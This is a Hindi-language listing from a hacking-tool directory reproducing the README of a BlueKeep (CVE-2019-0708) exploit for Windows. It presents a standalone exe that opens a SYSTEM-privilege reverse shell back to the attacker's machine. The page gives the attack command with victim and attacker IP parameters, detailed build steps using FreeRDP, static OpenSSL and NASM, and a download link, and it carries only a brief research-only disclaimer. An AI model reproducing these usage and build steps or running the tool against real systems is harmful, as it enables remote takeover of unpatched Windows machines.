Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0708-EXP-Windows — CVE-2019-0708-EXP-Windows संस्करण एकल-फ़ाइल exe संस्करण, चलाने के बाद सीधे वर्तमान कंसोल में System विशेषाधिकार वाला Shell रिवर्स करता है | Kitploit
उपकरण/GitHubGitHub/cbwang505/cve-2019-0708-exp-windows
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubcbwang505/cve-2019-0708-exp-windows

CVE-2019-0708-EXP-Windows

CVE-2019-0708-EXP-Windows संस्करण एकल-फ़ाइल exe संस्करण, चलाने के बाद सीधे वर्तमान कंसोल में System विशेषाधिकार वाला Shell रिवर्स करता है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखेंवेबसाइट
31768116 साल पहलेKitploit द्वारा समीक्षित
साझा करें

CVE-2019-0708-EXP-Windows-Version

अस्वीकरण

लेखक का poc केवल अनुसंधान उद्देश्यों के लिए है। यदि पाठक इस poc का उपयोग अन्य कार्यों के लिए करता है, तो इसका मेरे साथ कोई संबंध नहीं है।

विषय सूची

[toc]

परिचय

CVE-2019-0708-EXP का विंडोज संस्करण एकल फ़ाइल exe के रूप में चलता है, जिसमें Linux, Python, Ruby आदि की आवश्यकता नहीं होती है। चलाने के बाद यह सीधे वर्तमान कंसोल में System विशेषाधिकार के साथ शेल (Shell) को रिवर्स करता है।

संकलन पूरी तरह से स्थिर पुस्तकालय मोड (static library mode) का उपयोग करके सभी DLL को इनलाइन करता है, netcat और OpenSSL को एकीकृत करता है, प्रगति पट्टी (progress bar) प्रदर्शन और शेल इको संचालन का समर्थन करता है।

पुनरुत्पादन वातावरण

  1. पीड़ित ऑपरेटिंग सिस्टम: Windows 7 SP1 x64 बिट ऑपरेटिंग सिस्टम
  2. हमलावर ऑपरेटिंग सिस्टम: Windows 10 x64 बिट ऑपरेटिंग सिस्टम
  3. संकलन वातावरण: Visual Studio 2013

उपयोग निर्देश

  1. CVE-2019-0708-EXP-Release निर्देशिका में प्रवेश करें।
  2. wfreerdp.exe /v:Victim_IP /l:Attacker_IP चलाएँ, उदाहरण: wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

स्थापना ट्यूटोरियल

  1. FreeRDP-master प्रोजेक्ट को E:\git\KernelResearch\FreeRDP-master\ पर कॉपी करें।
  2. OpenSSL संकलन वातावरण स्थापित करें, या सीधे openssl.7z को C:\openssl\ पर निकालें और पूर्व-संकलित OpenSSL वातावरण का उपयोग करें।
  3. NASM संकलन वातावरण स्थापित करें।
  4. cmake-3.15.3-win64-x64.msi को व्यवस्थापक के रूप में स्थापित करें।
  5. C:\Program Files\CMake\bin को path पर्यावरण चर में जोड़ें।
  6. कंप्यूटर को पुनरारंभ करें।
  7. "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt चलाएँ।
  8. प्रोजेक्ट संकलित करें। यदि अभी भी फ़ाइलें गायब पाई जाती हैं, तो FreeRDP-master-restore.7z से पुनर्स्थापित करें।
OpenSSL संकलन वातावरण स्थापना ट्यूटोरियल
  1. openssl-1.0.2s.tar.gz को C:\openssl\ पर निकालें।
  2. ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi स्थापित करें।
  3. C:\Perl64\bin को path पर्यावरण चर में जोड़ें।
  4. VS2013 x64 मूल उपकरण कमांड प्रॉम्प्ट खोलें, जो स्टार्ट मेनू में पाया जा सकता है।
  5. perl Configure VC-WIN64A चलाएँ।
  6. cd /d C:\openssl\ चलाएँ।
  7. ms\do_win64a चलाएँ।
  8. अब संकलन शुरू करें। निम्नलिखित मोड का उपयोग किया जा सकता है। exp में स्थिर पुस्तकालय मोड का उपयोग किया गया है: OpenSSL डायनामिक लाइब्रेरी संकलित करें: nmake -f ms\ntdll.mak OpenSSL स्थिर लाइब्रेरी संकलित करें: nmake -f ms\nt.mak OpenSSL डायनामिक लाइब्रेरी का परीक्षण करें: nmake -f ms\ntdll.mak test OpenSSL स्थिर लाइब्रेरी का परीक्षण करें: nmake -f ms\nt.mak test OpenSSL डायनामिक लाइब्रेरी स्थापित करें: nmake -f ms\ntdll.mak install OpenSSL स्थिर लाइब्रेरी स्थापित करें: nmake -f ms\nt.mak install पिछले OpenSSL डायनामिक लाइब्रेरी संकलन को साफ़ करें (पुनर्संकलन के लिए): nmake -f ms\ntdll.mak clean पिछले OpenSSL स्थिर लाइब्रेरी संकलन को साफ़ करें (पुनर्संकलन के लिए): nmake -f ms\nt.mak clean
  9. पूरा होने के बाद, स्वयं out32 डायरेक्टरी के अंतर्गत libeay32.lib और ssleay32.lib फ़ाइलें ढूंढें और उन्हें C:\openssl\lib\ पर कॉपी करें।
NASM संकलन वातावरण स्थापना ट्यूटोरियल
  1. nasm-2.14.02-installer-x64.exe को व्यवस्थापक के रूप में स्थापित करें।
  2. C:\Program Files\NASM को path पर्यावरण चर में जोड़ें।
  3. nasmBuildCustomizations.rar में से तीन फ़ाइलों को C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\ पर निकालें।
  4. client -> common -> freerdp-client प्रोजेक्ट डायरेक्टरी चुनें, राइट-क्लिक करें -> 'बिल्ड डिपेंडेंसीज़' -> 'बिल्ड कस्टमाइज़ेशन', फिर 'nasm' विकल्प को चेक करें (ध्यान दें: 'masm' नहीं)।
  5. यदि freerdp-client प्रोजेक्ट में किसी भी .asm फ़ाइल का चयन करने पर राइट-क्लिक मेनू में संकलन विकल्प दिखाई देता है, तो इसका मतलब है कि NASM संकलन वातावरण सफलतापूर्वक स्थापित हो गया है।

चलाने का परिणाम

बड़ा देखने के लिए क्लिक करें

परियोजना होस्टिंग

मेरे poc का पता

योगदान

लेखक ZheJiang Guoli Security Technology से हैं, ईमेल: [email protected]

टूल डाउनलोड करें